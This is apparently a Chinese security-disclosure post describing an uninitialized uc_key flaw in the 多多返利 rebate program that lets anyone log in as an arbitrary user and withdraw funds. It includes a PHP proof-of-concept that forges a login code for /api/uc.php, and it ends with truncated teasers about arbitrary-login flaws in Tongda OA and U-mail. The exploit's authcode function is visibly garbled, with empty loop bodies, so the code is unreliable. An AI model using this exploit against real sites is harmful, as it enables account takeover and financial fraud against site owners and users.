多多返利程式,任意使用者登入,甚至可以提現

2022-09-23 22:48:14 字數 1006 閱讀 4020

簡要描述:多多返利程式,任意使用者登入,甚至可以提現!

詳細說明: /uc.php

在後台未開啟ucenter時候,存在典型的uc_key未初始化漏洞

由於uckey未初始化導致訪問者可以隨意呼叫uc介面的各種函式

其中包括自動登陸 修改密碼

漏洞證明:poc:

<?php

print_r('

---------------------------------------

uc_key uninitialized vul exploit

---------------------------------------

');if ($argc < 2)

error_reporting(0);

$username = $ar**[1];

$key = '';

$code = 'time=11111111111&username='.$username.'&action=synlogin';

$x = urlencode(authcode($code, "encode", $key));

print_r('plz copy this code~~ enjoy it~~ ^_^

/api/uc.php?code='.$x);

function authcode($string, $operation = 'decode', $key = '', $expiry = 0)

for($j = $i = 0; $i < 256; $i++)

for($a = $j = $i = 0; $i < $string_length; $i++)

if($operation == 'decode') else

} else

}?>

修復方案:

在後台未開啟ucenter整合的時候,或者未啟用的時候 刪除uc.php

啟用的時候沒有問題

作者 fadhack

通達OA任意使用者登入

漏洞簡介 在 logincheck code.php 檔案,變數 uid 為攻擊者可控,攻擊者可改變 uid 引數,從而控制該 sql 語句返回 user 表中指定 uid引數的使用者資訊,便可通過偽造引數來達到登入任意使用者的目的。該漏洞可獲取任意使用者session,包括系統管理員 影響版本 通...

U mail任意使用者新增漏洞(無需登入

由該漏洞即刻能增加郵件一名使用者,通過配合其他未知0day 即可getshell 只要登入了郵件伺服器,危害就很大了。可導致伺服器被入侵。在userapply.php中 省略若干 if password if nickname insert insert intouserlist mailbox,f...

通達OA前台任意使用者登入分析

最近爆了個通達 oa 任意使用者登入漏洞,正好分析分析,順便師傅一起學習。首先我們找到檔案根目錄的檔案logincheck code.php,這個檔案是沒有許可權驗證的。我們會發現在 180 行附近有兩行 login uid uid login user id user id session log...